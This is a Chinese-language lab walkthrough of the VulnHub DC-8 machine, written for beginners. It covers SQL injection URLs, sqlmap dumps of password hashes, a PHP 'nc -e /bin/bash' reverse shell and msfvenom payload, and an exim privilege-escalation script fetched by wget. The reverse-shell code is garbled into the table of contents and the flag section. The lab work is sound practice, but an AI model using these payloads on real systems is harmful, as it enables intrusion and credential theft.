靶机DC-8(详细渗透,适合新手渗透)
目次[*]靶机DC-8 (详细渗透,适合新手渗透)
[*]
[*]0x01靶机描述
[*]0x02环境搭建
[*]
[*]
[*]1. 下载并导入靶机
[*]2. 查看网络适配器
[*]3. 启动靶机
[*]0x03靶机渗透
[*]
[*]一、 信息收集
[*]
[*]
[*]1. 主机发现
[*]2. 端口扫描
[*]3. 详细扫描
[*]4. 目次扫描
[*]5. gobuster目次扫描
[*]6. 网站指纹识别
[*]二、 毛病发掘
[*]
[*]手工sql注入
[*]
[*]1. 通过手工验证,此处url含有sql注入毛病
[*]2. 判定字段数
[*]3. 判定显示位置
[*]4. 查看当前数据库
[*]5. 查找库d7db中全部的表
[*]6. 查找uesrs表中全部的列
[*]7. 查询表中的数据
[*]sqlmap自动化执行
[*]
[*]1. 查当前数据库
[*]2. 查表
[*]3. 查列
[*]4. 查数据
[*]4. 利用John举行暴力破解
[*]5. 可以将破解出来的密码实验ssh远程登录
[*]6. 在此网页实验登录,该网页由前面目次扫描得到
[*]远程代码执行毛病
[*]
[*]1.找到可以编辑php代码的地方
[*]2.实验写phpinfo代码
[*]三、 毛病利用
[*]
[*]方法一:
[*]
[*]1. 编写反弹shell脚本
[*]2.保存提交前开启kali举行监听
[*]3. 点击提交发现网页此时正跳转,而我们的攻击机已经拿到shell
[*]方法二:
[*]
[*]1. 利用msfvenom制作反弹shell脚本
[*]2.将php代码复制到网站中
[*]3. kali设置msf选项,举行监听
[*]4.提交接码(此时后台默认执行所编写的php脚本代码)
[*]5. 拿到shell,并用python打开一个标准shell
[*]四、 提权
[*]
[*]
[*]1.find 下令查找具有sudo权限的下令,发现exim4在利用时具有root权限`
[*]2.查看下令exim4下令版本
[*]3.利用serachsploit查找exim下令的毛病
[*]4.举行查看用法,发现有两个利用方法
[*]5.将文件复制到/tmp目次,并用python打开一个临时的HTTP服务
[*]6.将46996.sh下载到靶机
[*]7.然后我们再重新举行上传
[*][url=https://blog.csdn.net/#8<p>flag</p>
<?php
system("nc -e /bin/bash 192.168.30.182 4567");
?>_309]8.查看<p>flag</p>
<?php
system("nc -e /bin/bash 192.168.30.182 4567");
?>
[*]0x04实验总结
靶机DC-8 (详细渗透,适合新手渗透)
0x01靶机描述
靶机信息
链接https://www.vulnhub.com/entry/dc-8,367/发布日期2019年9月4日作者DCAU难度简朴0x02环境搭建
1. 下载并导入靶机
打开vmware-文件-打开-DC-8.ova
2. 查看网络适配器
将靶机网络适配器改为NAT模式
3. 启动靶机
点击 ▶靶机,开启乐成
0x03靶机渗透
一、 信息收集
1. 主机发现
2. 端口扫描
3. 详细扫描
4. 目次扫描
5. gobuster目次扫描
为了制止漏扫,gobuster再举行目次扫描
6. 网站指纹识别
二、 毛病发掘
手工sql注入
1. 通过手工验证,此处url含有sql注入毛病
http://192.168.30.206/?nid=2 and 1=1 --+
http://192.168.30.206/?nid=2 and 1=2 --+
2. 判定字段数
http://192.168.30.206/?nid=2 order by 1 --+
http://192.168.30.206/?nid=2 order by 2 --+
以是可以看出字段数为1
3. 判定显示位置
http://192.168.30.206/?nid=-2 union select 1 --+
4. 查看当前数据库
5. 查找库d7db中全部的表
http://192.168.30.206/?nid=-2 union select group_concat(table_name) from
information_schema.tables where table_schema=‘d7db’ --+
6. 查找uesrs表中全部的列
http://192.168.30.206/?nid=-2 union select group_concat(column_name) from
information_schema.columns where table_name=‘users’ --+
7. 查询表中的数据
http://192.168.30.206/?nid=-2 union select group_concat(name) from users --+
http://192.168.30.206/?nid=-2 union select group_concat(pass) from users --+
sqlmap自动化执行
1. 查当前数据库
sqlmap -u 'http://192.168.30.206/?nid=2' -current-db
2. 查表
sqlmap -u 'http://192.168.30.206/?nid=2' -D d7db --tables
3. 查列
sqlmap -u 'http://192.168.30.206/?nid=2' -D d7db -T users --columns
4. 查数据
sqlmap -u 'http://192.168.30.206/?nid=2' -D d7db -T users -C login,name,pass --dump 查询到两组数据
admin $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
john$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF 4. 利用John举行暴力破解
破解出john的密码trutle
5. 可以将破解出来的密码实验ssh远程登录
发现ssh远程登录失败,发现需要利用公私钥登录
6. 在此网页实验登录,该网页由前面目次扫描得到
http://192.168.30.206/user 登录乐成
[*] 远程代码执行毛病
1.找到可以编辑php代码的地方
2.实验写phpinfo代码
发现保存并提交后并没有任何显示。按照网上的说法,php代码保存后会执行代码,这应该是在靶机上已经执行了代码,只是在后台不会显示出来。
三、 毛病利用
方法一:
1. 编写反弹shell脚本
我们实验执行PHP反弹shell脚本,将原有的<p>flag</p>
<?php
system("nc -e /bin/bash 192.168.30.182 4567");
?>
举行保存,防止报错
<p>flag</p>
<?php
system("nc -e /bin/bash 192.168.30.182 4567");
?>
2.保存提交前开启kali举行监听
3. 点击提交发现网页此时正跳转,而我们的攻击机已经拿到shell
方法二:
1. 利用msfvenom制作反弹shell脚本
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.30.182 lport=9999
R >php_shell.txt
2.将php代码复制到网站中
3. kali设置msf选项,举行监听
4.提交接码(此时后台默认执行所编写的php脚本代码)
5. 拿到shell,并用python打开一个标准shell
python -c 'import pty;pty.spawn("/bin/bash")'
四、 提权
1.find 下令查找具有sudo权限的下令,发现exim4在利用时具有root权限`
find / -perm -u=s -type f 2>/dev/null
2.查看下令exim4下令版本
Exim version 4.89
3.利用serachsploit查找exim下令的毛病
4.举行查看用法,发现有两个利用方法
5.将文件复制到/tmp目次,并用python打开一个临时的HTTP服务
6.将46996.sh下载到靶机
wget http://192.168.30.182/46996.sh
举行赋权
执行,但是发现两种方法均发生错误
原因:这个报错是由于windows体系下编辑然后上传到linux体系执行导致的
办理方案:本地编辑查看文件范例:set ff=unix
7.然后我们再重新举行上传
利用第二个提权下令举行提权乐成
./46996.sh -m netcat
8.查看<p>flag</p>
<?php
system("nc -e /bin/bash 192.168.30.182 4567");
?>
0x04实验总结
这个靶机考察了目次扫描,sql注入,远程代码执行,反弹shell,提权时利用find查找可以执行的下令,对下令exim的版本提权毛病等,是一个不错的靶机,适合新手来渗透
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
页:
[1]